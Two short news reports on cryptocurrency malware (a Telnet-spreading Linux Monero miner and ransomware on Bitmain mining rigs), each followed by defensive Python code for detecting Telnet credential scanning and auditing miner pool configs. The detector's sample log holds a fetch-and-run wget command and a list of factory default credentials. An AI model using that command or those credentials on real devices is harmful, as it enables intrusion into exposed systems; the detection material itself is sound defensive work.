New crypto mining malware attacks Linux

The new cryptocurrency mining malware attacks Linux using Minergate’s Monero Pool
25 August 2017

A cryptocurrency mining malware strikes again: the sample known as Linux.BtcMine.26 is being actively distributed to Linux devices that still accept default Telnet credentials. Despite its name, it does not mine Bitcoin but Monero, an altcoin whose price has recently surged after weeks of sideways trading. It targets only x86-64 and ARM devices.

How it works

The distribution scheme of Linux.BtcMine.26 closely resembles Mirai's infection mechanism: the malware carries a built-in Telnet scanner similar to the one found in Mirai. For now the scanner only probes IPv4 addresses, although IPv6 support may be added in the future. Once it finds a host with Telnet exposed, it attempts to log in over the Telnet connection using default credentials. If the login succeeds, the malware executes commands on the device to download the BtcMine binary, themerkle.com reports.
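The propagation pattern described above (one source cycling through factory credentials, a login that succeeds with one of them, then a download command) is what a defender would look for on a Telnet honeypot or on any device that logs Telnet sessions. The following Python detector is an added example written for this page, not code from the original report, from Dr.Web or from Mirai; the key=value log format, the timestamps, the IP addresses (documentation ranges) and the short credential list are all constructed assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log in an assumed key=value format (not the output of any
# real honeypot). 203.0.113.7 behaves like a Mirai-style scanner; 192.0.2.44 is
# an operator logging in normally.
SAMPLE_LOG = """\
2017-08-25T10:00:01Z src=203.0.113.7 event=login_failed user=root pass=xc3511
2017-08-25T10:00:02Z src=203.0.113.7 event=login_failed user=root pass=vizxv
2017-08-25T10:00:03Z src=203.0.113.7 event=login_failed user=admin pass=admin1234
2017-08-25T10:00:04Z src=203.0.113.7 event=login_failed user=root pass=888888
2017-08-25T10:00:05Z src=203.0.113.7 event=login_success user=admin pass=admin
2017-08-25T10:00:06Z src=203.0.113.7 event=command cmd="cd /tmp; wget http://198.51.100.5/btcmine -O .x; chmod +x .x; ./.x"
2017-08-25T10:05:00Z src=192.0.2.44 event=login_failed user=operator pass=wrongpw
2017-08-25T10:05:30Z src=192.0.2.44 event=login_success user=operator pass=Sup3r-secret
2017-08-25T10:05:40Z src=192.0.2.44 event=command cmd="uptime"
"""

# A handful of the factory credentials Mirai-style scanners try. Illustrative
# only; this is not the full dictionary used by Mirai or Linux.BtcMine.26.
DEFAULT_CREDS = {
    ("root", "xc3511"), ("root", "vizxv"), ("root", "admin"), ("admin", "admin"),
    ("root", "888888"), ("root", "default"), ("admin", "admin1234"), ("root", ""),
}

# Commands typically used to fetch a payload onto a small Linux device.
DOWNLOAD_RE = re.compile(r"\b(wget|curl|tftp|ftpget)\b")

LINE_RE = re.compile(
    r'^(?P<ts>\S+) src=(?P<src>\S+) event=(?P<event>\S+)'
    r'(?: user=(?P<user>\S*) pass=(?P<pass>\S*))?(?: cmd="(?P<cmd>.*)")?$'
)


def parse_line(line):
    """Parse one assumed-format log line into a dict, or None if it does not match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%Y-%m-%dT%H:%M:%SZ")
    return rec


def cycles_credentials(attempts, window, threshold):
    """True if >= threshold distinct user/pass pairs were tried inside one window."""
    attempts = sorted(attempts, key=lambda r: r["ts"])
    for i, first in enumerate(attempts):
        seen = set()
        for r in attempts[i:]:
            if r["ts"] - first["ts"] > window:
                break
            seen.add((r["user"], r["pass"]))
            if len(seen) >= threshold:
                return True
    return False


def analyze(log_text, window=timedelta(seconds=60), threshold=3):
    """Return {src_ip: [findings]} for sources showing Mirai-style Telnet behaviour."""
    by_src = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec:
            by_src[rec["src"]].append(rec)

    findings = {}
    for src, recs in by_src.items():
        notes = []
        attempts = [r for r in recs if r["event"] in ("login_failed", "login_success")]
        # (1) credential cycling from a single source
        if cycles_credentials(attempts, window, threshold):
            notes.append("cycled through multiple credentials within %ds" % window.total_seconds())
        # (2) a login accepted with a known factory default
        for r in attempts:
            if r["event"] == "login_success" and (r["user"], r["pass"]) in DEFAULT_CREDS:
                notes.append("default credential accepted: %s/%s" % (r["user"], r["pass"]))
        # (3) a download command after login, the step that fetches the miner binary
        logged_in = False
        for r in recs:
            logged_in = logged_in or r["event"] == "login_success"
            if logged_in and r["event"] == "command" and DOWNLOAD_RE.search(r["cmd"] or ""):
                notes.append("download command after login: %s" % r["cmd"])
        if notes:
            findings[src] = notes
    return findings


if __name__ == "__main__":
    for src, notes in analyze(SAMPLE_LOG).items():
        print(src)
        for n in notes:
            print("  -", n)
```

On the sample above only 203.0.113.7 is reported, with all three indicators; the operator's one typo followed by a strong password and a harmless command produces nothing. The thresholds (three distinct credentials within sixty seconds) are starting points to tune against your own baseline, and on a production device the better fix is of course to disable Telnet and change the factory password rather than to detect the scan.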

Linux.BtcMine.26 mining malware code

Notably, the malware's code contains many references to Brian Krebs, one of the best-known infosec journalists, which suggests an ongoing feud between infosec journalists and cybercriminals. The code also reveals that the malware mines through the Minergate XMR (Monero) pool.

Chinese Miners to Fall Victims of Ransomware

The ransomware appears to arrive bundled with "improved" firmware that is supposed to "overclock" the device
21 January 2019

Ransomware whose victims are Bitcoin miners is spreading in China; the damage from it is measured in tens of thousands of dollars, Trustnodes reports.

The malware infects mining rigs made by Bitmain and demands that the victim send 10 bitcoins, threatening to overheat the device otherwise.

The problem can be fixed by reformatting the infected device's SD card, but, as Trustnodes notes, the whole process can take up to four days, during which the malware quickly spreads to other miners.

Compromised device

The malware most likely comes bundled with "improved" firmware for the miners. Some owners install such firmware to "overclock" their ASIC devices and improve their performance.

The first reports of the malware date back to August of the previous year. Antminer S9 and T9 units were attacked, and even the L3+ used for mining Litecoin. Over time the malware has been improved: its distributor can now decide when the ransom note is displayed. One miner also said that one night the address to which his 4,000 devices sent the mined cryptocurrency was changed to the hacker's address, which earned the hacker $8,000.
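The payout-address switch described above is silent from the rig's point of view: hashing continues, only the pool account in the miner's configuration has changed. A fleet operator can catch this by auditing each rig's pool configuration against an allowlist and against a known-good baseline. The Python below is an added example written for this page, not code from Trustnodes, Bitmain or the firmware in question; it assumes a cgminer-style JSON config with a "pools" list of url/user/pass entries (as used by Antminer firmware) and a "account.worker" convention for the user field, and the pool hostnames, account names and both config snapshots are constructed.

```python
import json

# Allowlist for this rig: constructed hostnames and account names, not real ones.
ALLOWED_POOLS = {"pool.example:3333", "pool-backup.example:3333"}
ALLOWED_ACCOUNTS = {"1ExamplePayoutAddr"}

# Constructed known-good snapshot in the assumed cgminer-style layout.
BASELINE_CONF = """{
"pools" : [
{ "url" : "stratum+tcp://pool.example:3333", "user" : "1ExamplePayoutAddr.rig01", "pass" : "x" },
{ "url" : "stratum+tcp://pool-backup.example:3333", "user" : "1ExamplePayoutAddr.rig01", "pass" : "x" }
],
"api-listen" : true
}"""

# Constructed snapshot after tampering: the primary pool now points at an
# unknown pool and pays out to a different account.
TAMPERED_CONF = """{
"pools" : [
{ "url" : "stratum+tcp://unknown-pool.example:3333", "user" : "1AttackerAddr.rig01", "pass" : "x" },
{ "url" : "stratum+tcp://pool-backup.example:3333", "user" : "1ExamplePayoutAddr.rig01", "pass" : "x" }
],
"api-listen" : true
}"""


def pool_entries(conf_text):
    """Return [(url, user)] from a cgminer-style JSON config; missing keys become ''."""
    conf = json.loads(conf_text)
    return [(p.get("url", ""), p.get("user", "")) for p in conf.get("pools", [])]


def payout_account(user):
    """Split the assumed 'account.worker' user field and return the account part."""
    return user.split(".", 1)[0]


def pool_host(url):
    """Strip the scheme so 'stratum+tcp://host:port' compares as 'host:port'."""
    return url.split("://", 1)[-1]


def audit(conf_text, allowed_pools=ALLOWED_POOLS, allowed_accounts=ALLOWED_ACCOUNTS):
    """Return a list of findings; an empty list means every pool entry is approved."""
    entries = pool_entries(conf_text)
    findings = []
    if not entries:
        findings.append("no pools configured")
    for i, (url, user) in enumerate(entries):
        if pool_host(url) not in allowed_pools:
            findings.append("pool %d: url %s is not an approved pool" % (i, url))
        if payout_account(user) not in allowed_accounts:
            findings.append("pool %d: payout account %s is not approved" % (i, payout_account(user)))
    return findings


def diff_pools(baseline_text, current_text):
    """Return [(index, old_entry, new_entry)] for entries that changed since the baseline."""
    base, cur = pool_entries(baseline_text), pool_entries(current_text)
    changes = []
    for i in range(max(len(base), len(cur))):
        old = base[i] if i < len(base) else None
        new = cur[i] if i < len(cur) else None
        if old != new:
            changes.append((i, old, new))
    return changes


if __name__ == "__main__":
    print("baseline:", audit(BASELINE_CONF) or "ok")
    print("tampered:", audit(TAMPERED_CONF))
    print("changes: ", diff_pools(BASELINE_CONF, TAMPERED_CONF))
```

Run the audit from a management host on a schedule, pulling each rig's config over its API or SSH, and alert on any non-empty result; the diff against a stored baseline catches changes to pools that happen to be on the allowlist as well. Formatting the SD card removes the malware, but it does not by itself tell you whether the payout account was changed, which is why the check belongs in routine monitoring rather than only in incident cleanup.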